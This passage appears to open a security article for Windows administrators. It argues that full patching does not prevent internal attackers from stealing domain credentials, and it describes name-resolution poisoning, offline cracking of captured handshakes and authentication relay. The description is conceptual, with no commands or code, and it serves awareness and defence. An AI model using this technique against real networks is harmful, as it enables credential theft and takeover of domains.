A common misconception by Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network which is fully patched and using the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in many cases privileged credentials, that can be leveraged to gain control over the entire domain.
One of the most popular methods used by penetration test teams in an internal engagement, is to listen for Windows broadcast traffic on the local network segment. By intercepting and manipulating name resolution traffic, it is possible to redirect authentication traffic to the attacker’s machine in a Man-in-the-Middle (MitM) attack. With the authentication handshake captured by the attacker, it is possible to perform a brute force offline password cracking attack in order to obtain the clear-text credentials. Even if the passwords in use are sufficiently complex to prevent passwords being cracked within a realistic timeframe, the authentication attempt can be relayed to another host in order to grant the attacker access to resources.